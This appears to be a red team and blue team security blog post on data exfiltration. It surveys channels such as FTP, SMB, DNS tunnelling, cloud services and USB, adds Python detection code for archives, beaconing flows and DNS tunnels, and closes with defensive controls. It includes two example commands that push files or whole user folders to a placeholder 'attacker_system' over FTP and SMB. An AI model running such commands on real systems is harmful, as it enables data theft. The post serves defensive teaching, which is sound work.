Exfiltrate Sensitive Data

Mohan reddy
Redteam & Blueteam Series
4 min read, May 4, 2020

Data exfiltration is the unauthorized copying, transfer or retrieval of data from a source. The attacker can exfiltrate data automatically, through the use of malware, or manually, through some remote code execution exploit. It is important to recognize that the automatic methods must be incredibly robust, as almost all of them can fail depending on the network environment. For this reason, an attacker who is exfiltrating data automatically will most likely use the methods least likely to fail and may even have backup methods ready in case of failure.

Red Team: Attack vectors and Techniques

Some of the most common protocols and standards used for data exfiltration or command and control include HTTP/HTTPS, FTP/FTPS/SFTP, SSH, IRC, email, P2P, and DNS or ICMP for covert channels. For both manual and automatic exfiltration, the channel chosen is likely to be a well-known and widely used one that has legitimate uses. The following are techniques I have seen in the wild.

1. To make the data portable and as small as possible, the attacker compresses and encrypts it. So check whether any files have been compressed (7zip, rar, zip, zlib).

Tools like network intrusion prevention and DLP help here by blocking specific file types over unencrypted channels, so the attacker may switch to an encrypted channel or to other mechanisms for encapsulating the traffic.

2. A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.

i) Emotet has been observed encrypting the data it collects before sending it to the C2 server.

ii) Other malware uses RC4, AES, AES plus base64 encoding, or 3DES.

iii) Some samples compress the data and then XOR-encrypt it.
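Items 1 and 2 both come down to spotting staged archives and encrypted blobs. The following is an added example (not from the original post) that identifies an archive by its magic bytes and flags bodies whose byte entropy is close to 8 bits per byte, which is what compressed or encrypted payloads look like; the magic values are taken from the public format specifications, the 7.0 threshold is an assumption to tune, and the sample blobs are constructed.

```python
import math
import zlib
from collections import Counter

# Magic-byte prefixes for the formats named in item 1 (from the public
# 7z, RAR and ZIP specs) and the common zlib stream headers.
MAGIC = {
    "7z":  b"7z\xbc\xaf\x27\x1c",
    "rar": b"Rar!\x1a\x07",      # covers RAR 4.x and RAR 5 signatures
    "zip": b"PK\x03\x04",        # local file header
}
ZLIB_HEADERS = (b"\x78\x01", b"\x78\x5e", b"\x78\x9c", b"\x78\xda")

def shannon_entropy(data: bytes) -> float:
    """Bits per byte; compressed or encrypted payloads sit close to 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def classify_blob(data: bytes, high: float = 7.0) -> dict:
    """Identify archive type by magic bytes and flag high-entropy bodies.
    `high` is an assumed threshold; plain text normally scores well below 6."""
    kind = next((k for k, m in MAGIC.items() if data.startswith(m)), None)
    if kind is None and data[:2] in ZLIB_HEADERS:
        kind = "zlib"
    ent = shannon_entropy(data)
    return {"kind": kind, "entropy": round(ent, 2), "high_entropy": ent >= high}

# Constructed samples: a real zlib stream of repetitive text, a 7z signature
# followed by a flat byte distribution (stands in for an encrypted archive
# body), and plain text that should not be flagged.
SAMPLE_ZLIB = zlib.compress(b"confidential " * 200)
SAMPLE_7Z = MAGIC["7z"] + bytes(range(256)) * 4
SAMPLE_TEXT = b"quarterly report, nothing to see here " * 20
```

Run it over files written to user-writable staging locations (temp, downloads, profile folders); a freshly created archive with a high-entropy body is exactly the item 1 and 2 pattern.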

3. Common sites like Dropbox, Google Drive and Box are often permitted, especially if an organisation outsources to shared cloud services, even when proxying and filtering are enabled. Sites like Pastebin or even GitHub also offer an easy exfiltration channel, and GitHub is permitted in many technical organisations.

4. Check whether the organisation hosts its own web servers that are accessible from the internet; compromising one of those gives the attacker a staging point.

5. Analyze network data for uncommon data flows:

i) A client sending significantly more data than it receives from a server.

ii) In a long-lived connection, fixed-size data packets being sent, or fixed-size packets being sent at regular intervals.
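Both of those flow patterns can be checked mechanically. Below is an added example (not from the original post) that runs over constructed, simplified flow records: `upload_heavy_clients` implements check i) as a bytes-out to bytes-in ratio, and `beacon_pairs` implements check ii) by looking for a source/destination pair whose connections carry the same payload size at a near-constant interval. The record format, the thresholds and the sample rows are all assumptions.

```python
import statistics
from collections import defaultdict

# Constructed flow records (not from the original post), one per line:
# epoch_seconds,src,dst,dst_port,bytes_out,bytes_in
FLOWS = """\
1000,10.0.0.5,203.0.113.9,443,512000,2100
1060,10.0.0.5,203.0.113.9,443,512000,2100
1120,10.0.0.5,203.0.113.9,443,512000,2100
1180,10.0.0.5,203.0.113.9,443,512000,2100
1005,10.0.0.7,198.51.100.3,443,1400,880000
1300,10.0.0.7,198.51.100.3,443,900,400000
1500,10.0.0.9,203.0.113.50,443,2000,1500
"""

def parse_flows(text):
    rows = []
    for line in text.strip().splitlines():
        ts, src, dst, port, out, inn = line.split(",")
        rows.append((int(ts), src, dst, int(port), int(out), int(inn)))
    return rows

def upload_heavy_clients(flows, ratio=5.0, min_bytes=100_000):
    """Check i): clients whose bytes out exceed bytes in by a wide margin."""
    out, inn = defaultdict(int), defaultdict(int)
    for _, src, _, _, bo, bi in flows:
        out[src] += bo
        inn[src] += bi
    return sorted(c for c in out
                  if out[c] >= min_bytes and out[c] > ratio * max(inn[c], 1))

def beacon_pairs(flows, min_hits=4, max_jitter=0.1):
    """Check ii): (src, dst) pairs sending same-size payloads at a steady cadence.
    Jitter is the coefficient of variation of the gaps between connections."""
    by_pair = defaultdict(list)
    for ts, src, dst, _, bo, _ in flows:
        by_pair[(src, dst)].append((ts, bo))
    hits = []
    for pair, recs in by_pair.items():
        if len(recs) < min_hits:
            continue
        recs.sort()
        sizes = {bo for _, bo in recs}
        gaps = [b[0] - a[0] for a, b in zip(recs, recs[1:])]
        mean = statistics.mean(gaps)
        jitter = statistics.pstdev(gaps) / mean if mean > 0 else 1.0
        if len(sizes) == 1 and jitter <= max_jitter:
            hits.append(pair)
    return sorted(hits)
```

In production the same logic runs over NetFlow or proxy logs aggregated per hour; the ratio and jitter thresholds need a baseline from your own traffic before they are useful.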

6. Data exfiltration is performed with a different protocol from the main command and control protocol or channel. Protocols include FTP, SMTP, HTTP/HTTPS, DNS, SSH, SMB and P2P.

The FTP protocol involves an authentication step, followed by the transfer of the file, followed by a closing of the connection. FTP also has the ability to decide which side of the connection will act as the client or connection initiator. This provides a slight advantage over other methods in that it allows an attacker to choose which way the connection will start, allowing some flexibility to bypass certain target-side firewall restrictions.

Standard file transfer using FTP allows the port of the receiving server to be specified by the server. Therefore, it is perfectly valid for FTP to transfer the file using non-standard ports for both malicious and non-malicious purposes.

Anonymous FTP command-line example:

echo PUT C:\Path\to\file.txt | ftp -A attacker_system

SMB Transfer

SMB command-line example:

net use \\attacker_system\IPC$ /user:username password && xcopy /S /H /C /Y C:\Users\* \\attacker_system\share_folder\

DNS Tunneling Vector

DNS tunneling is the process of creating a covert communication channel between a computer inside a network and a server outside it. Attackers can use this vector for C&C, data exfiltration or tunneling.
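Because the tunnelled data has to ride inside query names, a tunnel leaves a distinctive trace in resolver logs: one client issuing many distinct, long, random-looking subdomain labels under a single base domain. The following is an added example (not from the original post) that runs that check over a constructed query log; the log format, the length and uniqueness thresholds, and the two-label base-domain guess are assumptions.

```python
from collections import defaultdict

# Constructed DNS query log (not from the original post), one query per line:
# "epoch client qname qtype". The long random-looking labels under
# tun.example.net stand in for encoded data chunks carried in query names.
DNS_LOG = """\
1000 10.0.0.5 www.example.com A
1001 10.0.0.5 3q7v2k9x1p0m8n4b6c.tun.example.net TXT
1002 10.0.0.5 z8r1w5y2u6t0o9i3a7.tun.example.net TXT
1003 10.0.0.5 k4m2p9n7x1v5b8c3q6.tun.example.net TXT
1004 10.0.0.5 e5h8j1l4d7s0f3g6a2.tun.example.net TXT
1005 10.0.0.5 t9y6u3i0o7p4a1s8d5.tun.example.net TXT
1006 10.0.0.7 mail.example.com MX
1007 10.0.0.7 cdn.example.com A
"""

def base_domain(qname, levels=2):
    """Crude registrable-domain guess: the last two labels (no public-suffix list)."""
    return ".".join(qname.rstrip(".").split(".")[-levels:])

def looks_encoded(label, min_len=16, min_unique_ratio=0.7):
    """Long label made mostly of distinct characters; real hostnames rarely are."""
    return len(label) >= min_len and len(set(label)) / len(label) >= min_unique_ratio

def dns_tunnel_candidates(text, min_unique=5):
    """(client, base_domain) pairs that issued many distinct encoded-looking
    first labels under one base domain, with the count of distinct labels."""
    seen = defaultdict(set)
    for line in text.strip().splitlines():
        _, client, qname, _ = line.split()
        first = qname.split(".")[0]
        if looks_encoded(first):
            seen[(client, base_domain(qname))].add(first)
    return sorted((k, len(v)) for k, v in seen.items() if len(v) >= min_unique)
```

CDN and anti-spam services also generate long machine-made labels, so allow-list known base domains before alerting on the result.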

7. Built-in tools such as WMIC, BITSADMIN, curl and wget help transfer data, but can sometimes be detected.

8. If an attacker or malicious insider has physical access, various options are open: exfiltration over a physical medium (USB, MP3 player, Bluetooth, phone, etc.).

fsquirt # Windows Bluetooth transfer tool

Channels used to exfiltrate sensitive data

BLUE TEAM: Detective and Preventive Controls

Monitoring egress points from the internal network is another way to improve security. The most common locations to perform exfiltration monitoring include border gateways, at-edge IDS/IPS platforms, in the DMZ/DMZ firewall zones and within internal IDS/IPS that are in-line. DLP platforms can also do network exfiltration monitoring for data types, keywords and other more advanced pattern matches.

Endpoint & Network level

Filter Network Traffic — Enforce proxies and use dedicated servers for services such as DNS, and only allow those systems to communicate over the respective ports/protocols, instead of all systems within the network.

Network Intrusion Prevention — Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level.

Network Segmentation — Follow best practices for network firewall configuration to allow only necessary ports and traffic to enter and exit the network.

OS Configuration — Prevent the creation of new network adapters wherever possible. Exfiltration can occur over a different network medium than the C&C channel [Bluetooth, radio frequency channel].

Disable Removable Media — Prevent the intruder from grabbing confidential data by not allowing USB access.

Process Level:

1. Preparation is the key to effective identification and response. Training end users at regular intervals and raising awareness of cyberattacks helps the organization defend against them.

2. Implement incident response procedures for handling security incidents, breaches, and cyber threats.

3. Maintain secure configurations.

4. Train staff on the latest security threats and security tools.
